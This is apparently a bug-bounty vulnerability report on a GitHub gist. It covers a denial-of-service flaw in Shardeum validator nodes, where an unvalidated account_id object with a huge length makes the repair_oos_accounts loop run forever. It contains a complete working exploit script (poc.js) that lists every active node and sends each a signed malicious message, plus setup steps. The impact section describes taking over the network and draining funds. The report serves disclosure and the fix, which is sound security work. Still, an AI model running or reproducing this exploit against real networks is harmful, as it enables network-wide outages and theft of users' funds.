@Slonser

Slonser/desc.md Secret

Last active August 3, 2024 23:33
Improper input validation in repair_oos_accounts

Brief/Intro

Shardeum validator nodes, implemented in the https://github.com/shardeum/shardeum repository, are vulnerable to a complete DOS due to missing input validation in the repair_oos_accounts (https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L336) and repairMissingAccountsBinary (https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L489) internal endpoints. Exploitation completely stalls the targeted validator node's process, and because the exploit is so simple, it can be executed against all active nodes. A more sophisticated attack would shut down most of the nodes, but not all, so that attacker-controlled nodes are the only ones left available and can then be used to take over the whole network.

Vulnerability Details

In the repairMissingAccountsBinary and repair_oos_accounts handlers, there is a loop that iterates up to receivedBestVote.account_id.length (https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L413):

for (let i = 0; i < receivedBestVote.account_id.length; i++) {
  if (receivedBestVote.account_id[i] === accountID) {
    if (receivedBestVote.account_state_hash_after[i] !== calculatedAccountHash) {
      nestedCountersInstance.countEvent('accountPatcher', `repair_oos_accounts: account hash mismatch for txId: ${txId}`)
      accountHashMatch = false
    } else {
      accountHashMatch = true
    }
    break
  }
}

The issue arises from the fact that receivedBestVote is taken from the request data and its account_id field is never validated to be an array, which allows an attacker to pass the following object as part of the request data:

"appliedVote":sign({
  "node_id":NODE_ID,
  "transaction_result":"result",
  "account_id":{
    length: 10000000000000000000000000000000000000000000
  }
})

This makes the loop effectively infinite. The value 10000000000000000000000000000000000000000000 is far greater than Number.MAX_SAFE_INTEGER, so the loop could never finish that many iterations, and once i reaches 2^53 the increment i++ no longer changes it, so the condition i < length stays true forever. Because NodeJS runs the handler on the process' single event loop thread, no other logic will be able to run, practically shutting the validator node down and leaving it to waste CPU cycles indefinitely.
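
Why a loop bounded by such a length can never terminate can be checked directly: once a JavaScript number reaches 2^53, adding 1 no longer changes it. The following is a minimal sketch and not the shardus-core code. The names spoofedLength and seen are made up for the illustration, and the counter is started just below 2^53 (the real loop starts at 0) so that the effect shows up after a few steps.

```javascript
// Illustration only: a scaled-down version of the loop condition.
// The length value is the one used in the payload above (1e43).
const spoofedLength = 10000000000000000000000000000000000000000000;

console.log(spoofedLength > Number.MAX_SAFE_INTEGER); // true

// Assumption for the demo: start just below 2^53 instead of at 0.
let i = 2 ** 53 - 2;
const seen = [];
for (let step = 0; step < 5; step++) {
  seen.push(i);
  i++; // beyond 2^53 this increment is lost to floating-point rounding
}

console.log(seen[2] === 2 ** 53); // true: the counter reached 2^53
console.log(seen[3] === seen[2]); // true: it did not advance afterwards
console.log(i < spoofedLength);   // true: the loop condition still holds
```

The counter stalls at 9007199254740992, so `i < length` can never become false for a length as large as the one in the payload.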

Impact Details

The most basic outcome would be a total network shutdown caused by exploiting the DOS vulnerability on each active validator node. Since exploitation does not cause the nodes' processes to actually shut down or crash, the whole network will just stop processing any requests and user transactions. Starting the network back up would require a fix to be deployed to all nodes, which makes the attack more difficult to mitigate.
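
One possible shape for such a fix is a guard that rejects a malformed vote before the loop is ever reached. The sketch below is an assumption about how this could look, not the patch that was actually deployed. isWellFormedVote and MAX_ACCOUNTS_PER_VOTE are hypothetical names that do not exist in shardus-core, the cap value is arbitrary, and treating the entries as strings is also an assumption. Only the field names account_id and account_state_hash_after are taken from the loop shown in Vulnerability Details.

```javascript
// Hypothetical guard, not part of shardus-core.
const MAX_ACCOUNTS_PER_VOTE = 1000; // assumed cap, not a Shardeum constant

function isWellFormedVote(vote) {
  if (vote === null || typeof vote !== "object") return false;
  const ids = vote.account_id;
  const hashes = vote.account_state_hash_after;
  // Array.isArray rejects array-like objects such as { length: 1e43 }.
  if (!Array.isArray(ids) || !Array.isArray(hashes)) return false;
  if (ids.length !== hashes.length) return false;
  if (ids.length > MAX_ACCOUNTS_PER_VOTE) return false;
  // Assumption: account IDs and hashes are strings.
  return (
    ids.every((id) => typeof id === "string") &&
    hashes.every((hash) => typeof hash === "string")
  );
}

const spoofedVote = { account_id: { length: 1e43 } };
const plausibleVote = {
  account_id: ["ab12"],
  account_state_hash_after: ["cd34"],
};

console.log(isWellFormedVote(spoofedVote));   // false
console.log(isWellFormedVote(plausibleVote)); // true
```

A handler would call such a check first and return early on failure, so the length used in the loop always belongs to a real array of bounded size.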

A more complex attack scenario, as said in the intro, would be the shutdown of nearly all, but not all, validator nodes, so that the attacker's nodes would be the only ones left available, leaving the whole network under the attacker's control. This means the network will continue functioning, but the attacker will be able to execute any transaction they want and drain all the funds to themselves.

References

JavaScript max and min safe-to-use number values: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER, https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MIN_SAFE_INTEGER

network-32.patch

diff --git a/src/config/genesis.json b/src/config/genesis.json
index 1d7df74..459da21 100644
--- a/src/config/genesis.json
+++ b/src/config/genesis.json
@@ -521,5 +521,8 @@
},
"0xe33BF2d6b28c6aC880cd81b5564A92a42593369d": {
"wei": "10000001000000000000000000"
+ },
+ "0xe6e789891Aad9E4ea1e0E37214Bd7067598BAdEc": {
+ "wei": "100000000000000000000"
}
}
diff --git a/src/config/index.ts b/src/config/index.ts
index 665bb88..0970b18 100644
--- a/src/config/index.ts
+++ b/src/config/index.ts
@@ -132,8 +132,8 @@ config = merge(config, {
p2p: {
cycleDuration: 60,
minNodesToAllowTxs: 1, // to allow single node networks
- baselineNodes: process.env.baselineNodes ? parseInt(process.env.baselineNodes) : 300, // config used for baseline for entering recovery, restore, and safety. Should be equivalient to minNodes on network startup
- minNodes: process.env.minNodes ? parseInt(process.env.minNodes) : 300,
+ baselineNodes: process.env.baselineNodes ? parseInt(process.env.baselineNodes) : 32, // config used for baseline for entering recovery, restore, and safety. Should be equivalient to minNodes on network startup
+ minNodes: process.env.minNodes ? parseInt(process.env.minNodes) : 32,
maxNodes: process.env.maxNodes ? parseInt(process.env.maxNodes) : 1100,
maxJoinedPerCycle: 10,
maxSyncingPerCycle: 10,
@@ -146,7 +146,7 @@ config = merge(config, {
amountToShrink: 5,
maxDesiredMultiplier: 1.2,
maxScaleReqs: 250, // todo: this will become a variable config but this should work for a 500 node demo
- forceBogonFilteringOn: true,
+ forceBogonFilteringOn: false,
//these are new feature in 1.3.0, we can make them default:true in shardus-core later
// 1.2.3 migration starts
@@ -309,8 +309,8 @@ config = merge(
mode: 'release', // todo: must set this to "release" for public networks or get security on endpoints. use "debug"
// for easier debugging
debug: {
- startInFatalsLogMode: true, // true setting good for big aws test with nodes joining under stress.
- startInErrorLogMode: false,
+ startInFatalsLogMode: false, // true setting good for big aws test with nodes joining under stress.
+ startInErrorLogMode: true,
robustQueryDebug: false,
fakeNetworkDelay: 0,
disableSnapshots: true, // do not check in if set to false

package.json

{
"name": "dos",
"author": "neplox",
"type": "module",
"dependencies": {
"@shardus/crypto-utils": "^4.1.3",
"@shardus/net": "^1.3.15",
"@shardus/types": "^1.2.14",
"axios": "^1.7.2",
"ethers": "^6.13.1"
}
}

poc.js

import * as net from "@shardus/net";
import axios from "axios";
import {Utils} from '@shardus/types'
import * as crypto from '@shardus/crypto-utils'
import {ethers} from 'ethers';
// Default archiver node address when using the shardus tool.
const ARCHIVER_URL = "http://127.0.0.1:4000";
// Default URL used by https://github.com/shardeum/json-rpc-server for a local setup.
const JSON_RPC_URL = "http://127.0.0.1:8080";
// Attacker account details.
// This public key is added to genesis.json with 100 SHM coins.
const ATTACKER_ACCOUNT = {
address: "0xe6e789891Aad9E4ea1e0E37214Bd7067598BAdEc",
privateKey:
"0x620a76f869092278b2fc8cff07fa2458f6240c81e93bee80e0b7c69751d6c661",
};
// Your node keypair and NODE_ID
const keypair = {"publicKey":"f8b0912b45c3c2c3b5157cd4f27e0af23bf4cb3d209838d96690a55660a6b9a6","secretKey":"2d822469f9a05a1db81e70a94f0c57007939d5a8cde2562bd60cb89f9aafa579f8b0912b45c3c2c3b5157cd4f27e0af23bf4cb3d209838d96690a55660a6b9a6"}
const NODE_ID = "b4f94a5bfb91ed0f7ef1d4ee9bd622fa74a1769e278ba5fde9021673c74771e9"
const HASH_KEY = "69fa4195670576c0160d660c3be36556ff8d504725be8a59b5a96509e0c994bc"
crypto.init(HASH_KEY)
// Step 1.
// Retrieve all kinds of nodes from the archiver by requesting each list separately.
const nodelistCalls = [
"/full-nodelist?activeOnly=true"
];
async function fetchExternalNodeAddrs() {
const nodeAddrs = [];
for (const call of nodelistCalls) {
const url = `${ARCHIVER_URL}${call}`;
try {
const response = await axios.get(url);
const nodes = response.data.nodeList;
for (let node of nodes) {
nodeAddrs.push({
ip: node.ip,
externalPort: node.port,
id: node.id
});
}
console.log(`Retrieved ${nodes.length} nodes from ${url}`);
} catch (error) {
console.log(`Failed to retrieve nodelist ${url}: ${error.message}`);
}
}
console.log(`Retrieved total ${nodeAddrs.length} external node addresses`);
return nodeAddrs;
}
// Step 2.
// Retrieve internal address information from each node in order to access the internal protocol.
async function fetchInternalNodeAddrs(nodeAddrs) {
for (let nodeAddr of nodeAddrs) {
const host = `${nodeAddr.ip}:${nodeAddr.externalPort}`;
try {
const response = await axios.get(`http://${host}/nodeinfo`);
nodeAddr.internalIp = response.data.nodeInfo.internalIp;
nodeAddr.internalPort = response.data.nodeInfo.internalPort;
} catch (error) {
console.log(`Failed to retrieve internal address for node ${host}`);
}
}
console.log(`Retrieved internal endpoint addresses for nodes`);
}
// Default opts used by Shardeum, don't actually matter for exploit.
const sn = net.Sn({
port: 1337,
senderOpts: {
useLruCache: true,
lruSize: 1000,
},
headerOpts: {
sendHeaderVersion: 1,
},
crypto: {
hashKey: "69fa4195670576c0160d660c3be36556ff8d504725be8a59b5a96509e0c994bc",
// Extracted from a local node, doesn't actually matter.
signingSecretKeyHex:
"61b8e6b087b03bf945e66ae58d029a9a934f829a6316e03d58c463e155c4c0fb6292263d62054d2dc7cc372e78367d6b3656fd164a71bd585e38bf603e382aed",
},
});
//Step 3.
// generate txId
async function getTxId (nodeAddr) {
const provider = new ethers.JsonRpcProvider(JSON_RPC_URL);
const wallet = new ethers.Wallet(ATTACKER_ACCOUNT.privateKey, provider);
const balance = await wallet.provider.getBalance(wallet.address);
console.log(
`Attacker's (${wallet.address}) balance: ${ethers.formatEther(balance)}`
);
// getBalance returns a bigint in ethers v6; the account needs funds to pay for the transaction.
if (balance <= 0n) {
throw new Error(
`Attacker's (${wallet.address}) balance (${balance}) is too low to pay for the transaction.`
);
}
const [feeData, nonce] = await Promise.all([
wallet.provider.getFeeData(),
wallet.provider.getTransactionCount(wallet.address),
]);
const stakeData = {
isInternalTx: true,
internalTXType: 4, // InternalTXType.ApplyChangeConfig
change: {
cycle: 1,
change: {
mode: "debug",
},
},
}
const tx = await wallet.sendTransaction({
from: wallet.address,
to: "0x0000000000000000000000000000000000010000",
gasPrice: feeData.gasPrice,
gasLimit: 30000000,
value: 1,
data: ethers.hexlify(ethers.toUtf8Bytes(JSON.stringify(stakeData))),
nonce,
});
console.log(tx);
// Poll until the node reports the transaction, waiting 10 seconds between attempts.
while (true) {
await sleep(10000);
const res = await axios.get(`http://${nodeAddr.ip}:${nodeAddr.externalPort}/tx/${tx.hash}`);
if (res.data.account != null) {
console.log(`Got txID ${res.data.account.txId}`);
return res.data.account.txId;
}
}
}
// Step 4.
// Send malicious message via internal protocol using @shardus/net which will be parsed using Utils.safeJsonParse.
async function exploit(nodeAddr, txId) {
const payload = {
"accountID": "0000000000000000000000000000000000000000",
"txId": txId,
"hash":"1231231231231231231231231",
"accountData":{
"data":{
"accountType":6,
"account":{
"storageRoot":{
"data":{
"length": 16
}
},
"codeHash":{
"data":{
"length": 16
}
}
}
}
},
"targetNodeId": nodeAddr.id,
"receipt2":{
"appliedVote":sign({
"node_id":NODE_ID,
"transaction_result":"result",
"account_id":{
length: 10000000000000000000000000000000000000000000
}
})
}
}
let opt = {
"ADDRESS": "127.0.0.1",
"PORT": "10002",
"UUID": "35f6ed5a-b4ab-4974-9223-242b6e832681",
"payload": _wrapAndSignMessage({
"repairInstructions":[payload]
}),
"route":"repair_oos_accounts",
"msgDir":"ask",
"receivedTime":0,
"replyReceivedTime": 0,
"replyTime": 0,
"sendTime": Date.now(),
"timeout":5000
}
console.log(
`Executing DOS on node ${nodeAddr.ip}:${nodeAddr.externalPort} by sending message to internal ${nodeAddr.internalIp}:${nodeAddr.internalPort}`
);
await sn.send(
nodeAddr.internalPort,
nodeAddr.internalIp,
opt,
1000,
(e) => {console.log(e)},
(e) => {console.log(e)}
);
}
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
async function main() {
let nodeAddrs = await fetchExternalNodeAddrs();
await fetchInternalNodeAddrs(nodeAddrs);
const txId = await getTxId(nodeAddrs[0]);
for (let nodeAddr of nodeAddrs) {
exploit(nodeAddr, txId);
}
}
main();
function _wrapMessage(msg, tracker = '') {
if (!msg) throw new Error('No message given to wrap and tag!')
return {
payload: msg,
sender: NODE_ID,
tracker,
msgSize: 0,
}
}
function sign(obj){
const objCopy = Utils.safeJsonParse(Utils.safeStringify(obj))
crypto.signObj(objCopy, keypair.secretKey, keypair.publicKey)
return objCopy
}
function signWithSize(obj) {
const wrappedMsgStr = Utils.safeStringify(obj)
const msgLength = wrappedMsgStr.length
obj.msgSize = msgLength
return sign(obj)
}
function _wrapAndSignMessage(msg, tracker = '') {
const wrapped = _wrapMessage(msg, tracker)
return signWithSize(wrapped)
}

Proof of concept

This POC demonstrates total network shutdown as the main impact. Fund loss would follow from it, since all validator nodes except the attacker's would be crippled, but to keep the POC simple only the validator node DOS is implemented.

poc.js from the attached gist contains the main exploit code, which automatically disables all the active nodes of the network after retrieving their addresses from the archiver. This writeup shows exactly how it was tested and how it works.

Local Shardeum network setup

This vulnerability is equally exploitable with any number of nodes as exploitation of a single validator node requires sending just a single message via the internal protocol. For demonstration purposes, however, a network with only 32 validator nodes is created.

Any Shardeum network using the current validator node code will be vulnerable, so it is not necessary to follow these exact steps. They are here just to showcase how the POC was tested by me.

  1. Clone the Shardeum repo and switch to the last commit on the dev branch, which is c7b10c2370028f7c7cbd2a01839e50eb50faa904 as of this POC's submission.

    git clone https://github.com/shardeum/shardeum.git
    cd shardeum
    git switch --detach c7b10c2370028f7c7cbd2a01839e50eb50faa904
  2. Switch to NodeJS 18.16.1, which is the version used by Shardeum in dev.Dockerfile and its various library requirements. For example, using asdf (https://asdf-vm.com/):

    asdf install nodejs 18.16.1
    asdf local nodejs 18.16.1
  3. Apply the network-32.patch file from the attached gist for network setup. Note that it DOES NOT enable debug mode, demonstrating the vulnerability in a semi-realistic release setup.

    git apply network-32.patch
  4. Install dependencies and build the project.

    npm ci
    npm run prepare
  5. Launch the network with 32 nodes as specified in the patch using the shardus tool.

    npx shardus create 32

After this step, it usually takes 15-20 minutes for at least some validator nodes to become active, at which point the exploit itself can be run. I used the monitor at http://localhost:3000/ to wait for nodes to start activating.

JSON-RPC API setup

To simplify the POC, Shardeum's json-rpc-server is used to interact with the network, specifically to send a single transaction from the attacker's account so that its ID can later be used with the repair_oos_accounts endpoint.

  1. Clone the json-rpc-server repo and switch to the last commit on the dev branch, which is c3c462a4b18bc7517e086ff70f08ae6afede3b31 as of this POC's submission.

    git clone https://github.com/shardeum/json-rpc-server.git
    cd json-rpc-server
    git switch --detach c3c462a4b18bc7517e086ff70f08ae6afede3b31
  2. Switch to NodeJS 18.16.1, which is the version used by json-rpc-server in Dockerfile and its various library requirements. For example, using asdf (https://asdf-vm.com/):

    asdf install nodejs 18.16.1
    asdf local nodejs 18.16.1
  3. Install dependencies.

    npm install
  4. Launch the JSON RPC server. This must be done once the Shardeum network is at least partially active, for the server to receive and be able to interact with valid archiver and validator nodes.

    npm run start

DOS exploitation for network shutdown

As said in the introduction, poc.js from the attached gist contains the exploit code and can be run on any network as long as a valid archiver URL and the attacker's validator node info are supplied. It runs on NodeJS and requires a few of the Shardus packages (@shardus/crypto-utils, @shardus/net, @shardus/types) as well as the ethers and axios libraries to be installed, as specified in the attached package.json. Following is a detailed writeup of how it works:

NOTE: modify the keypair and NODE_ID variables with the values of one of the nodes in the network, for the POC to simulate requests from an attacker-controlled validator node. The keypair should be set to the contents of a node's secrets.json, and NODE_ID can be set to the value of id retrieved from a node's /nodeinfo endpoint.

  1. A request to the specified archiver's full-nodelist endpoint is made in order to retrieve the full list of active validator nodes in the network. Running the DOS on these nodes means that no more nodes will be available, leading to a total shutdown of the network.

  2. Each node's /nodeinfo endpoint is queried to retrieve the internalIp, internalPort and id values.

  3. Using getTxId, we create a new transaction (it doesn't matter if it succeeds or not). This is done to obtain a txId that is used in the next step.

  4. A message with payload of the form

       repairInstructions:[{
       "accountID": "0000000000000000000000000000000000000000",
       "txId": txId,
       "hash":"1231231231231231231231231",
       "accountData":{
         "data":{
             "accountType":6,
             "account":{
                 "storageRoot":{
                     "data":{
                         "length": 16
                     }
                 },
                 "codeHash":{
                     "data":{
                         "length": 16
                     }
                 }
             }
         }
      },
       "targetNodeId": nodeAddr.id,
       "receipt2":{
         "appliedVote":sign({
             "node_id":NODE_ID,
             "transaction_result":"result",
             "account_id":{
               length: 10000000000000000000000000000000000000000000
             }
         })
       }
     }]
    

    is sent using the internal protocol to the repair_oos_accounts handler, triggering the vulnerability. The infinite for loop then blocks NodeJS' event loop, making each active validator node unresponsive and practically stopping the network.

Shardeum's monitor dashboard, launched by default on http://localhost:3000/, can be used to check that all active nodes are now marked red as they go offline and stop reporting to the monitor. Any request made to the validator nodes will hang, as the network is completely stopped at this point.
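
Besides the monitor, a hung node can also be detected from a script by putting a timeout on a request to it. The following is a minimal sketch under stated assumptions. isNodeResponsive is a hypothetical helper that is not part of the POC or of any Shardus package, the 3 second default timeout is arbitrary, and the default fetch relies on the global fetch available in NodeJS 18. The fetchImpl parameter exists only so the helper can be exercised without a live network.

```javascript
// Hypothetical liveness probe; not part of poc.js or the Shardus packages.
// Resolves to true only if the node answers with a 2xx status within timeoutMs.
async function isNodeResponsive(url, timeoutMs = 3000, fetchImpl = fetch) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    const response = await fetchImpl(url, { signal: controller.signal });
    return response.ok;
  } catch {
    // Aborted by the timeout, connection refused, or otherwise unreachable.
    return false;
  } finally {
    clearTimeout(timer);
  }
}

// Example call, with ip and externalPort taken from the archiver's node list:
//   const alive = await isNodeResponsive(`http://${ip}:${externalPort}/nodeinfo`);
```

A node whose event loop is blocked would be expected to accept the connection but never answer, so the probe reports it as unresponsive once the timeout fires instead of waiting forever.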
